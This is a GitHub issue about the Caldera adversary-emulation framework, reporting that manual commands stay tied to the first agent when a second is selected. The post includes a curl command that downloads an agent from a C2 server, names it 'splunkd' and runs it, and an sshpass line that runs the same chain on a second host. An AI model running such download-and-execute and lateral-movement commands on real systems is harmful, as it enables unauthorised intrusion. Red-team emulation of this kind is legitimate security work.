Deploying agent through sshpass, second host acts odd - What am I missing? #2896

Open
koncentrat11 opened this issue Feb 21, 2024 · 3 comments

koncentrat11 commented Feb 21, 2024

I am trying to use the initial host as a bot and recruit a new host using SSH from the initial host, but the second host seems to act odd.

Step 1) Compromise first host (Host1):

"server="http://xxx.xxx.xxx.xxx:8888";curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > splunkd;chmod +x splunkd;./splunkd -server $server -group red -v"

Step 2) Utilize sshpass to compromise second host (Host2):

sshpass -p "pw" ssh username@xxx.xxx.xxx.xxx server="http://xxx.xxx.xxx.xxx:8888";curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > splunkd;chmod +x splunkd;./splunkd -server $server -group red -v

I see the new agent (Host2) pop up in Caldera, but when I try to execute commands manually by selecting it as an agent, the responses are still from Host1 and Host2 dies shortly after. What am I missing? It seems like it ignores that I choose Host2 and keeps using Host1?

Edit: It seems like it defaults to one agent, even though I select another, the first will still appear in the agent columns under operations.

koncentrat11 (Author) commented

It seems like you are unable to choose an agent of your choice; if you add a manual command, it will select the same agent even though you select a different one in the dropdown?

elegantmoose self-assigned this Feb 27, 2024

elegantmoose (Contributor) commented

On our queue.

This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days
